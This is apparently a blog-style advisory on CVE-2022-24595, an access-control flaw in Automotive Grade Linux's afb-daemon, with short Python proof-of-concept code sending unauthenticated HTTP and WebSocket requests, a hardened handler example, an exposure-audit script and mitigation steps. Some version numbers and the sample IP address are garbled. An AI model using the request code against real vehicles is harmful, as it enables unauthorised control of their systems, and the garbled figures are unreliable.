CVE-2022-24595 is a critical vulnerability that affects multiple versions of Automotive Grade Linux (AGL) Kooky Koi, specifically versions 11.. through 11..5. Discovered in the afb-daemon binary, this bug allows unauthorized remote attackers to execute privileged actions simply by sending specially crafted HTTP or WebSocket requests. No authentication, credentials, or user interaction are required—making this a particularly dangerous flaw for connected vehicles and systems leveraging AGL.

🕵️‍♀️ What is Automotive Grade Linux (AGL)?

Automotive Grade Linux is an open source platform that serves as a base operating system for automotive applications, used by major automakers and suppliers globally. The afb-daemon (Application Framework Binder daemon) acts as a central middleware process, enabling communication between apps, vehicle signals, and cloud services.

🚨 The Vulnerability Explained

The root cause of CVE-2022-24595 is Incorrect Access Control in usr/bin/afb-daemon.

How It Happens

- The afb-daemon listens for incoming HTTP/WebSocket requests on a local or network socket.
- An attacker can send a well-crafted HTTP or WebSocket request.
- If processed by afb-daemon, the request could trigger administrative actions or expose sensitive info.

Simply put: Any nearby device (or network node) can talk directly to the car's middleware and ask it to perform tasks, with no security barriers in place.
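The access-control gap described above comes down to request handling that dispatches to a verb before anyone has checked who is asking. The following added example (written for this page, not code from AGL or afb-daemon) contrasts that pattern with a checked one. The token carriers it looks at (an x-afb-token header or a token query parameter) and the pong/ping verb are assumptions for illustration; the requests at the bottom are constructed.

```python
import hmac
from typing import Callable, Dict, Mapping, Optional
from urllib.parse import parse_qs, urlsplit

# A request here is just a path plus a header map; the handler returns a
# small dict instead of writing to a socket so it can be exercised offline.
Response = Dict[str, object]
Dispatcher = Callable[[str], Response]


def extract_token(path: str, headers: Mapping[str, str]) -> Optional[str]:
    """Pull the caller's token from the header or, failing that, the query string.

    The header name and query parameter are assumptions used for this example.
    """
    header_token = headers.get("x-afb-token")
    if header_token:
        return header_token
    query = parse_qs(urlsplit(path).query)
    return query.get("token", [None])[0]


def handle_request_unchecked(path: str, headers: Mapping[str, str],
                             dispatch: Dispatcher) -> Response:
    """Vulnerable pattern: the verb runs no matter who sent the request."""
    return dispatch(path)


def handle_request_checked(path: str, headers: Mapping[str, str],
                           dispatch: Dispatcher, expected_token: str) -> Response:
    """Hardened pattern: refuse before dispatch unless a valid token is presented.

    compare_digest is used so a wrong token takes the same time as a right one,
    which keeps the check from leaking how many leading characters matched.
    """
    token = extract_token(path, headers)
    if token is None or not hmac.compare_digest(token.encode(), expected_token.encode()):
        return {"status": 401, "body": "unauthorized"}
    return dispatch(path)


def demo_dispatch(path: str) -> Response:
    """Stand-in for the verb table; answers only the ping verb (constructed)."""
    if urlsplit(path).path == "/api/helloworld/ping":
        return {"status": 200, "body": "pong"}
    return {"status": 404, "body": "no such verb"}


if __name__ == "__main__":
    secret = "example-token-do-not-reuse"  # constructed value
    # Constructed request with no credentials at all.
    print("unchecked:", handle_request_unchecked("/api/helloworld/ping", {}, demo_dispatch))
    print("checked, no token:", handle_request_checked("/api/helloworld/ping", {}, demo_dispatch, secret))
    print("checked, header token:", handle_request_checked(
        "/api/helloworld/ping", {"x-afb-token": secret}, demo_dispatch, secret))
```

The point to take from the two handlers is ordering: the check has to sit in front of the dispatcher, on every transport (HTTP and WebSocket alike), or an unauthenticated caller gets exactly the behaviour this CVE describes.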

👾 Proof-of-Concept Code

Here’s a basic Python example for talking to a vulnerable afb-daemon using HTTP. (Do not use this on vehicles you do not own or have explicit permission to test!)

import requests

# Replace with your target's IP address and port
target = "http://192.168..10:808"

# Sample API endpoint (as used in AGL API docs)
endpoint = "/api/helloworld/ping"

url = f"{target}{endpoint}"

# No authentication involved: the GET is sent with no token or session
response = requests.get(url)

print("Status:", response.status_code)
print("Response:", response.text)

Depending on how the afb-daemon is configured, you may also craft POST requests to manipulate or control components.

For WebSocket communication (using the websockets library):

import asyncio
import websockets

async def call_afb_daemon():
    # Replace with your target's IP address and port
    uri = "ws://192.168..10:808/api"
    async with websockets.connect(uri) as websocket:
        # Sample JSON-RPC command (may vary per service/exposure)
        payload = '{"jtype":"afb_req","request":{"api":"helloworld","verb":"ping"}}'
        await websocket.send(payload)
        response = await websocket.recv()
        print("Received:", response)

# asyncio.run() replaces the deprecated get_event_loop().run_until_complete() pattern
asyncio.run(call_afb_daemon())

Outcome: If vulnerable, the daemon will answer or execute the command—despite no credentials being presented.

Real-World Attack Scenarios

- Evil Device on Car Wi-Fi: An attacker connects to the same Wi-Fi network as the vehicle. They scan for open ports, find the afb-daemon socket, and issue damaging commands.
- Malicious App in the Car: If untrusted or rogue apps are able to reach the daemon, they may escalate privileges or attack the system.

🛡️ What Should You Do?

1. Upgrade your AGL platform. The Automotive Grade Linux team advises upgrading to a patched version or installing hotfixes.
2. Restrict network access to any process running afb-daemon.
3. Enable authentication for all HTTP/WebSocket endpoints exposed by afb-daemon.
4. Review AGL Security Best Practices: https://docs.automotivelinux.org/docs/architecture/en/dev/reference/security/
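Step 2 above is only verifiable if you know which addresses afb-daemon is actually bound to. The following added audit script (written for this page, not an AGL tool) parses `ss -H -ltnp` output and flags any afb-daemon listener bound to a wildcard or non-loopback address. The sample output embedded in it is constructed, not captured from a vehicle; the process name, PIDs and ports are illustrative assumptions.

```python
import re
import subprocess
from dataclasses import dataclass
from typing import List

# Constructed sample of `ss -H -ltnp` output (-H: no header, -l: listening,
# -t: TCP, -n: numeric, -p: owning process). Not captured from a real system.
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 127.0.0.1:1234 0.0.0.0:* users:(("afb-daemon",pid=812,fd=7))
LISTEN 0 128 0.0.0.0:8080 0.0.0.0:* users:(("afb-daemon",pid=812,fd=9))
LISTEN 0 128 [::]:8081 [::]:* users:(("afb-daemon",pid=913,fd=9))
LISTEN 0 128 127.0.0.1:22 0.0.0.0:* users:(("sshd",pid=401,fd=3))
"""

LOOPBACK_PREFIXES = ("127.", "[::1]")
PROCESS_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


@dataclass
class Listener:
    process: str
    pid: int
    address: str
    port: int

    @property
    def exposed(self) -> bool:
        """True when the bind address is reachable from beyond the host itself."""
        return not self.address.startswith(LOOPBACK_PREFIXES)


def parse_ss(output: str) -> List[Listener]:
    """Turn `ss -H -ltnp` lines into Listener records; lines without a process are skipped."""
    listeners = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        local = fields[3]
        # rsplit keeps bracketed IPv6 addresses such as [::] intact.
        address, port = local.rsplit(":", 1)
        match = PROCESS_RE.search(fields[5])
        if not match:
            continue
        listeners.append(Listener(match.group(1), int(match.group(2)), address, int(port)))
    return listeners


def find_exposed(listeners: List[Listener], process_name: str = "afb-daemon") -> List[Listener]:
    """Return the listeners of the named process that are not bound to loopback."""
    return [l for l in listeners if l.process == process_name and l.exposed]


def audit_host(process_name: str = "afb-daemon") -> List[Listener]:
    """Run ss on the local host and return exposed listeners (requires iproute2)."""
    output = subprocess.run(["ss", "-H", "-ltnp"], capture_output=True, text=True, check=True).stdout
    return find_exposed(parse_ss(output), process_name)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; call audit_host() on a real host.
    for listener in find_exposed(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"EXPOSED: {listener.process} (pid {listener.pid}) bound to {listener.address}:{listener.port}")
```

Anything the script reports should either be moved to a loopback bind, placed behind a firewall rule that limits the port to the intended peers, or fronted by the authentication in step 3. The loopback listener on port 1234 in the sample is reported as safe precisely because it cannot be reached from the vehicle's Wi-Fi segment.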

📚 Original References

- NVD Entry: CVE-2022-24595
- Automotive Grade Linux Home
- afb-daemon GitHub Repository
- AGL Security Overview

📝 Takeaway

CVE-2022-24595 is a powerful reminder that even essential middleware in automotive systems can harbor dangerous bugs if access controls are overlooked. Manufacturers, integrators, and users should always lock down potentially exposed sockets, enforce authentication, and keep platform software up-to-date.

This vulnerability lets an attacker become an admin of the car’s digital ecosystem—simply by sending a network packet. Don’t let your car get hacked: patch and protect your AGL-based systems today!


*Exclusively written in simple American English for clarity. If you want more technical deep-dives or help with securing your AGL deployment, check out the linked documentation and community resources above.*

Timeline

Published on: 03/18/2022 12:15:00 UTC
Last modified on: 03/28/2022 13:23:00 UTC